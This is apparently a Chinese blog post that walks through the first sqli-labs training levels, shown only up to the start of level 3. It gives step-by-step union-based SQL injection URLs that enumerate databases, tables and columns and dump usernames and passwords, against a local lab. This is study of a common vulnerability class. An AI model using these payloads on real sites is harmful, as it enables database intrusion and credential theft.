<!DOCTYPE html>
<html lang="zh—CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico">
  <link rel="mask-icon" href="/images/favicon.ico" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yichennet.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false,"b2t":true,"scrollpercent":true},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="第一关字符型注入 解析过程1.查询字段：1?id&#x3D;1&#39; order by 5%23   采用折半查找，找到一个最大的不报错的数字，则为该表的字段长度，这里为3； 2.查询回显点：1?id&#x3D;&#39; union select 1,2,3%23   由图可知回显点为第二、第三个字段，所以我们之后查询的内容要放在第二、第三字段才会显示；">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-1到10">
<meta property="og:url" content="https://yichennet.github.io/2020/06/28/WEB/sql%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="逸晨のBlog">
<meta property="og:description" content="第一关字符型注入 解析过程1.查询字段：1?id&#x3D;1&#39; order by 5%23   采用折半查找，找到一个最大的不报错的数字，则为该表的字段长度，这里为3； 2.查询回显点：1?id&#x3D;&#39; union select 1,2,3%23   由图可知回显点为第二、第三个字段，所以我们之后查询的内容要放在第二、第三字段才会显示；">
<meta property="og:locale" content="zh—CN">
<meta property="og:image" content="https://segmentfault.com/img/bVben0J?w=367&h=34">
<meta property="og:image" content="https://segmentfault.com/img/bVben0Q?w=309&h=134">
<meta property="og:image" content="https://segmentfault.com/img/bVben1l?w=356&h=42">
<meta property="og:image" content="https://segmentfault.com/img/bVben1t?w=463&h=82">
<meta property="og:image" content="https://segmentfault.com/img/bVben1E?w=1306&h=41">
<meta property="og:image" content="https://segmentfault.com/img/bVben1R?w=677&h=45">
<meta property="og:image" content="https://segmentfault.com/img/bVben12?w=585&h=40">
<meta property="og:image" content="https://segmentfault.com/img/bVben2f?w=1434&h=173">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhkilrw1j30rk069aai.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhli3d71j30o308mq3j.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhmdq7qhj30ng08w0ta.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhn6q6q5j30pq099dgj.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhou1zp4j315807ugmq.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhplxyvaj31ak09pdh3.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhqxoubqj31b808ot9v.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhrr7yjsj31bw08zjt8.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdi29d8evj317w0cegns.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetaz9zvuj30ym07maan.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetc1wrhcj30jr0bdgm6.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetcxljbcj30mj0bfgmb.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetdkmj0nj30oo0asmxz.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggeteecwxdj31cz0c9wgx.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetf9uslzj31c70bnjse.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetfzmlttj31et0apgmq.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetgi5drbj31fo08x0ua.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdi29d8evj317w0cegns.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggeti0joedj30wl0asmy8.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetijq2vuj30ub088gm3.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetiwdkjpj30wm08lgm6.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetjdtt3tj312i09jdgm.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetjuhn18j317h08rt9n.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetk6wh1lj31au08zq3x.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetkw5kopj31ae095dgt.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggetlcivrhj31f4095gn4.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdiammb6dj31cj0f7ady.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdidgwq1rj31gq0s10w7.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdieet72aj31gq0s3n2h.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdigc6mr0j31f308ttad.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdiinkv3gj31f50h3wgj.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdimcc5rlj30up0nqjue.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdjmyzxj0j31au0bltcu.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdjsgft4cj31c90a4jv6.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdjv8cq71j31bs0b3tcm.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdk2p98hkj31e30a1wi7.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggg4cnodc2j30dn04b0st.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggg4hzxnp0j30wu03jdg3.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggg5443tklj30s106gaak.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggg5586cnmj30m503i74g.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggg5atnmsej30i102ywen.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggg5g0mom1j318d02cjrh.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdv8l7n8cj315c08cjsf.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdvamcek4j31fo0puacs.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdvkcb91pj30qo0sctc6.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggemlwglufj30l602h3yf.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggdwvd8ah3j30qr0543yk.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggemk0szn3j30px05awel.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggemomkc61j30qf03dglp.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPgy1ggemou759hj30oq0a6dga.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1gggxtclvsbj30ke0ld0vt.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1gggxwvz7u4j31hb05tq3e.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1gggxz5432uj31hc07v74u.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy1sbjm9j31hc0823z0.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy2k8hshj31hc0823z0.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy3s7z5qj31hc0bomya.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy5zk8swj31hc08kdgd.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy71svhcj31hb075js1.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy8cb8x2j31hc05ut93.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy9qs24hj31hc07mmxn.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006ZDEGPly1gggyae5pzuj31h803ct8t.jpg">
<meta property="article:published_time" content="2020-06-28T02:51:57.385Z">
<meta property="article:modified_time" content="2020-07-22T06:49:58.483Z">
<meta property="article:author" content="逸晨">
<meta property="article:tag" content="WEB">
<meta property="article:tag" content="信息安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://segmentfault.com/img/bVben0J?w=367&h=34">

<link rel="canonical" href="https://yichennet.github.io/2020/06/28/WEB/sql%E6%B3%A8%E5%85%A5/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh—CN'
  };
</script>

  <title>sqli-1到10 | 逸晨のBlog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">逸晨のBlog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">记录生活中的点点滴滴</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh—CN">
    <link itemprop="mainEntityOfPage" href="https://yichennet.github.io/2020/06/28/WEB/sql%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/tx.jpeg">
      <meta itemprop="name" content="逸晨">
      <meta itemprop="description" content="直到这一刻微笑着说话为止，我至少留下了一公升眼泪">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="逸晨のBlog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sqli-1到10
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-06-28 10:51:57" itemprop="dateCreated datePublished" datetime="2020-06-28T10:51:57+08:00">2020-06-28</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-07-22 14:49:58" itemprop="dateModified" datetime="2020-07-22T14:49:58+08:00">2020-07-22</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">信息安全</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2020/06/28/WEB/sql%E6%B3%A8%E5%85%A5/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/06/28/WEB/sql%E6%B3%A8%E5%85%A5/" itemprop="commentCount"></span>
    </a>
  </span>
  
  <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>8.8k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>8 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="第一关字符型注入-解析过程"><a href="#第一关字符型注入-解析过程" class="headerlink" title="第一关字符型注入 解析过程"></a>第一关字符型注入 解析过程</h1><h3 id="1-查询字段："><a href="#1-查询字段：" class="headerlink" title="1.查询字段："></a>1.查询字段：</h3><figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="attr">id=</span><span class="number">1</span>' <span class="keyword">order</span> <span class="title">by</span> <span class="number">5</span>%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="https://segmentfault.com/img/bVben0J?w=367&h=34" alt="图片描述"></p>
<p>采用折半查找，找到一个最大的不报错的数字，则为该表的字段长度，这里为3；</p>
<h3 id="2-查询回显点："><a href="#2-查询回显点：" class="headerlink" title="2.查询回显点："></a>2.查询回显点：</h3><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=' union select <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="https://segmentfault.com/img/bVben0Q?w=309&h=134" alt="图片描述"></p>
<p>由图可知回显点为第二、第三个字段，所以我们之后查询的内容要放在第二、第三字段才会显示；</p>
<a id="more"></a>

<h3 id="3-查询数据库版本信息："><a href="#3-查询数据库版本信息：" class="headerlink" title="3.查询数据库版本信息："></a>3.查询数据库版本信息：</h3><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=' union select <span class="number">1</span>,version(),<span class="number">3</span>%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="https://segmentfault.com/img/bVben1l?w=356&h=42" alt="图片描述"></p>
<h3 id="4-查询当前数据库和用户："><a href="#4-查询当前数据库和用户：" class="headerlink" title="4.查询当前数据库和用户："></a>4.查询当前数据库和用户：</h3><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=' union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">database</span>(),<span class="keyword">user</span>()%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="https://segmentfault.com/img/bVben1t?w=463&h=82" alt="图片描述"></p>
<h3 id="5-查询所有数据库："><a href="#5-查询所有数据库：" class="headerlink" title="5.查询所有数据库："></a>5.查询所有数据库：</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">?id=' union <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(schema_name) <span class="keyword">from</span> information_schema.schemata),<span class="number">3</span>%<span class="number">23</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#两种方法</span></span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>, <span class="keyword">group_concat</span>(schema_name) <span class="keyword">from</span> information_schema.schemata %<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="https://segmentfault.com/img/bVben1E?w=1306&h=41" alt="图片描述"></p>
<h3 id="6-查询表名："><a href="#6-查询表名：" class="headerlink" title="6.查询表名："></a>6.查询表名：</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">?id=' union <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="string">'security'</span>),<span class="number">3</span>%<span class="number">23</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#两种方法</span></span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>, <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="number">0x7365637572697479</span></span><br></pre></td></tr></table></figure>

<p><img src="https://segmentfault.com/img/bVben1R?w=677&h=45" alt="图片描述"></p>
<h3 id="7-查询列名："><a href="#7-查询列名：" class="headerlink" title="7.查询列名："></a>7.查询列名：</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">?id=' union <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="string">'security'</span> <span class="keyword">and</span> table_name=<span class="string">'users'</span>),<span class="number">3</span>%<span class="number">23</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#两种方法</span></span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>, <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=<span class="number">0x7573657273</span> %<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="https://segmentfault.com/img/bVben12?w=585&h=40" alt="图片描述"></p>
<h3 id="8-查询用户名和密码："><a href="#8-查询用户名和密码：" class="headerlink" title="8.查询用户名和密码："></a>8.查询用户名和密码：</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">?id=' union <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(username separator <span class="string">';'</span>) <span class="keyword">from</span> <span class="keyword">users</span>),(<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">password</span> separator <span class="string">';'</span>) <span class="keyword">from</span> <span class="keyword">users</span>)%<span class="number">23</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#两种方法</span></span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>, <span class="keyword">group_concat</span>(<span class="keyword">concat_ws</span>(<span class="number">0x7e</span>,username,<span class="keyword">password</span>)) <span class="keyword">from</span> security.users%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="https://segmentfault.com/img/bVben2f?w=1434&h=173" alt="图片描述"></p>
<h1 id="第二关整数型注入-解析过程"><a href="#第二关整数型注入-解析过程" class="headerlink" title="第二关整数型注入 解析过程"></a>第二关整数型注入 解析过程</h1><h3 id="1-查询字段：-1"><a href="#1-查询字段：-1" class="headerlink" title="1.查询字段："></a>1.查询字段：</h3><figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="attr">id=</span><span class="number">1</span> <span class="keyword">order</span> <span class="title">by</span> <span class="number">5</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhkilrw1j30rk069aai.jpg" alt="图片描述"></p>
<p>采用折半查找，找到一个最大的不报错的数字，则为该表的字段长度，这里为3；</p>
<h3 id="2-查询回显点：-1"><a href="#2-查询回显点：-1" class="headerlink" title="2.查询回显点："></a>2.查询回显点：</h3><figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-<span class="number">1</span> <span class="class"><span class="keyword">union</span> <span class="title">select</span> 1,2,3</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhli3d71j30o308mq3j.jpg" alt="图片描述"></p>
<p>由图可知回显点为第二、第三个字段，所以我们之后查询的内容要放在第二、第三字段才会显示；</p>
<h3 id="3-查询数据库版本信息：-1"><a href="#3-查询数据库版本信息：-1" class="headerlink" title="3.查询数据库版本信息："></a>3.查询数据库版本信息：</h3><figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-<span class="number">1</span> <span class="class"><span class="keyword">union</span> <span class="title">select</span> 1,<span class="title">version</span>(),3</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhmdq7qhj30ng08w0ta.jpg" alt="图片描述"></p>
<h3 id="4-查询当前数据库和用户：-1"><a href="#4-查询当前数据库和用户：-1" class="headerlink" title="4.查询当前数据库和用户："></a>4.查询当前数据库和用户：</h3><figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-<span class="number">1</span> <span class="class"><span class="keyword">union</span> <span class="title">select</span> 1,<span class="title">database</span>(),<span class="title">user</span>()</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhn6q6q5j30pq099dgj.jpg" alt="图片描述"></p>
<h3 id="5-查询所有数据库：-1"><a href="#5-查询所有数据库：-1" class="headerlink" title="5.查询所有数据库："></a>5.查询所有数据库：</h3><figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-<span class="number">1</span> <span class="class"><span class="keyword">union</span> <span class="title">select</span> 1,(<span class="title">select</span> <span class="title">group_concat</span>(<span class="title">schema_name</span>) <span class="title">from</span> <span class="title">information_schema</span>.<span class="title">schemata</span>),3</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhou1zp4j315807ugmq.jpg" alt="图片描述"></p>
<h3 id="6-查询表名：-1"><a href="#6-查询表名：-1" class="headerlink" title="6.查询表名："></a>6.查询表名：</h3><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=<span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> group_concat(<span class="built_in">table_name</span>) <span class="keyword">from</span> information_schema.<span class="keyword">tables</span> <span class="keyword">where</span> table_schema=<span class="string">'security'</span>),<span class="number">3</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhplxyvaj31ak09pdh3.jpg" alt="图片描述"></p>
<h3 id="7-查询列名：-1"><a href="#7-查询列名：-1" class="headerlink" title="7.查询列名："></a>7.查询列名：</h3><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=<span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> group_concat(<span class="built_in">column_name</span>) <span class="keyword">from</span> information_schema.<span class="keyword">columns</span> <span class="keyword">where</span> table_schema=<span class="string">'security'</span> <span class="keyword">and</span> <span class="built_in">table_name</span>=<span class="string">'users'</span>),<span class="number">3</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhqxoubqj31b808ot9v.jpg" alt="图片描述"></p>
<h3 id="8-查询用户名和密码：-1"><a href="#8-查询用户名和密码：-1" class="headerlink" title="8.查询用户名和密码："></a>8.查询用户名和密码：</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;-1 union select 1,(select group_concat(username separator &#39;;&#39;) from users),(select group_concat(password separator &#39;;&#39;) from users)</span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdhrr7yjsj31bw08zjt8.jpg" alt="图片描述"></p>
<h1 id="第三关字符型注入-解析过程"><a href="#第三关字符型注入-解析过程" class="headerlink" title="第三关字符型注入 解析过程"></a>第三关字符型注入 解析过程</h1><p>本题与第一题类似，<strong>区别就是判断闭合点</strong></p>
<h3 id="‘’判断闭合点"><a href="#‘’判断闭合点" class="headerlink" title="‘’判断闭合点"></a>‘’判断闭合点</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="attribute">id</span>=1'</span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1ggdi29d8evj317w0cegns.jpg" alt="图片描述"></p>
<p>以下都和第一题类似，本文不在复述</p>
<h3 id="1-查询字段：-2"><a href="#1-查询字段：-2" class="headerlink" title="1.查询字段："></a>1.查询字段：</h3><figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://<span class="number">127.0</span>.<span class="number">0.1</span>/sqli/Less-<span class="number">3</span>/?<span class="attr">id=</span><span class="number">1</span>') <span class="keyword">order</span> <span class="title">by</span> <span class="number">5</span> %<span class="number">23</span></span><br></pre></td></tr></table></figure>

